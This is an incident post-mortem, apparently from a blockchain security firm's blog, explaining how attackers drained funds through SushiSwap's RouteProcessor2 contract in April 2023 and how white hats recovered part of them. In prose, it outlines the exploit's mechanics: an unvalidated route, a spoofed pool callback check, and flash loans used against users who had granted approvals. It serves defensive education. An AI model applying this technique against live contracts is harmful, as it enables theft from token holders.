Audits
Services
Services
Smart Contract Audit
Blockchain Protocol Audit
Penetration Testing
dApp Audit
Crypto Wallet Audit
Cross-Chain Bridge Audit
Bug Bounty
Proof of Reserves
CCSS Audit
Tokenomics Audit & Design
Smart Contract Audit
Mitigate weaknesses in your smart contract and improve its functionality with a double line-to-line code analysis and a separate review by a lead auditor.
Blockchain Protocol Audit
Secure the entire architecture and implementation layers of your blockchain protocol with professional security audits and testing.
Penetration Testing
Proactively detect vulnerabilities in your Web3 project by subjecting your systems to a simulated cyberattack in a secure and controlled environment.
dApp Audit
Identify vulnerabilities in applications interacting with blockchain networks with secure code review and static security analysis.
Crypto Wallet Audit
Code review & static security analysis for crypto wallet apps.
Cross-Chain Bridge Audit
Code review & security analysis for cross-chain crypto bridges.
Bug Bounty
Receive only relevant bug reports or undergo crowdsourced penetration testing with the help of thousands of ethical hackers curated by HackenProof.
Proof of Reserves
Enhance transparency in crypto exchanges with independent on-chain proof of assets’ true collateralization.
CCSS Audit
Assess and strengthen your security practices, identify vulnerabilities, and safeguard valuable digital assets in the ever-evolving cryptocurrency landscape.
Tokenomics Audit & Design
Ensure your token model robustness and efficiency and convey trust to investors and community with our thorough, independent audit of protocol economic security.
Solutions
Post-deployment security solution
Hacken Extractor
Real-time smart contract protection from assets loss
Learn more
Solutions
Featured ecosystems:
Ethereum (EVM)
BSC
Polygon
Near
Avalanche
Fantom
Aptos
Sui
Optimism
zkSync
Arbitrum
Solana
Polkadot
Cosmos
Radix
Linea
MetaMask
Others
By Languages:
Solidity
Rust
Move
Blog
Company
Company

The window to exchange $HAI for Hacken Equity Shares ($HES) is now open > Claim your spot today

SushiSwap DEX Hack Explained

SushiSwap DEX Hack Explained

Share via:

TL;DR

SushiSwap suffered a reentrancy attack on April 9, 2023.
The attackers stole $3.3 Million, but white hats gracefully recovered over 1,000 ETH.
The hacker exploited a vulnerability in a new routing contract launched four days before the attack.

On April 9, 2023, unknown hackers managed to steal $3.3M, with one user @0xsifu losing 1,800 ETH. The main flaw? The hacker exploited an “approve-related bug” in the RouterProcessor2 smart contract, which caused a failure to validate access permissions halfway through a swap transaction.

Key points:

The exploited contract was introduced four days before the hack.
All users who had approved the RouteProcessor2 contract were at risk.
The risk spanned across 14 chains: Arbitrum Nova, Arbitrum, Avax, Boba, BSC, Ethereum, Fantom, Fuse, Gnosis, Moonbeam, Moonriver, Optimism, Polygon, Polygon ZkEVM.

Fortunately, the contract had relatively few approvers, which limited the breach’s scale, preventing it from being even more significant. The total losses accounted for $3.3 million.

Vulnerability & Root Cause

There was a sneaky flaw in the swap transaction involving permissions. But the main cause of the hack was – the RouteProcessor2 contract, which was barely four days old when the hackers struck.

Let’s dig deeper.

What Made It Such An Easy Target?

Firstly, the contract failed to properly validate the route parameter that users were sending for the processRoute function. This gave attackers the keys, and they steered that route right to their malicious controlled pool.

Then, the hackers summoned the swapUniV3, which did a nifty trick – it changed the lastCalledPool variable to their pool’s address and quickly stopped at the swap function of the malicious pool.

Next, that swap function called uniswapV3SwapCallback to check if the sender was the lastCalledPool. And guess what? The callback was accepted since the attacker manipulated that value to point to their pool’s address.

Using it, the attacker constructed transactions with one goal – to drain tokens from the accounts of those unsuspecting users who had given the green light to the new RouteProcessor2 contract.

Attackers created a malicious pool to exploit the validation bug and drain funds.

What Tools and Techniques Were Used By Hackers?

SushiSwap hacker employed the following methods:

Etherscan – to monitor the activity of the RouterProcessor2 contract and identify potential victims.
Approval exploit – to steal funds from SushiSwap’s RouterProcessor2 contract, bypassing the permission check by manipulating the storage slot.
Flash loans – to obtain large amounts of ETH and USDC from protocols such as Aave and dYdX. The hacker then used these funds to interact with the RouterProcessor2 contract and trigger the exploit.
Reentrancy attack – to repeatedly call the swap3callback function and drain funds from multiple victims in one transaction. This technique exploits a reentrancy vulnerability in some smart contracts that do not prevent recursive calls.

The Heroes: White Hats Save The Day

At first, a 3rd-party security firm identified the hacker’s initial transactions, blocking a loss of 100 ETH. But after this ‘yoink’ attack, the hacker made a second attempt and succeeded. Sushi was already on its toes, so quickly called on white hat hackers for rescue.

On the day of the attack, the white hat community recovered over 1,000 ETH of the stolen funds:

300 ETH recovered by 0XCoffeBabe
700 ETH by Lido
At least 4 ETH across 600 addresses by Anish Agnihotri

Jared Grey, Sushi’s Head Chef, acknowledged the error and advised users to revoke their approvals.

Sushi Reimbursement Plan

Just three days post-exploit, Sushi announced a reimbursement plan to calm its user base. They came up with a Merkle Claim contract that affected people could use to retrieve funds from the white hats’ addresses.

Even better: SushiSwap developed a tool to check for exposure across various networks, including Ethereum, Polygon, Avalanche, Arbitrum, Gnosis, Optimism, and others.

Market Reactions & Consequences

The SUSHI token experienced a minor 6% drop in the 24 hours after the exploit. The damage, fortunately, wasn’t massive or widespread.

Users affected were either swiftly drained or had their permissions revoked, and the heroic white hat efforts played a significant role in minimizing the PR fallout. Nevertheless, this incident remains a significant source of embarrassment for SushiSwap, and it appears that the drama isn’t over yet.

Just a week before the hack, Jared Grey, SushiSwap’s key figure, highlighted a substantial surge in volume for the DEX’s cross-chain swap (xSwap). On top of that, Sushi’s DAO recently found itself in the crosshairs of the U.S. SEC. The legal case is yet to play out.

Lessons Learned

Let’s talk about the lessons learned from this SushiSwap hack. It underscores the critical importance of validating user-provided input. In this case, the failure to validate user-provided routes for RouteProcessor2 allowed the attacker to establish a malicious pool and take tokens from users who had granted approvals for RouteProcessor2.

Like many of the most significant DeFi hacks we’ve seen, this attack took advantage of vulnerabilities in unaudited code. Therefore, prioritizing smart contract audits and penetration testing should be the go-to approach for most projects in the DeFi space.

On top of that, the active involvement of white hat hackers proved invaluable post-exploit. Hence, this case also proves the importance of engaging a broader community, including through bug bounties, for your cybersecurity needs. Sushi provided a more modest bounty than the industry standard, but thankfully, passionate white hats quickly came to help.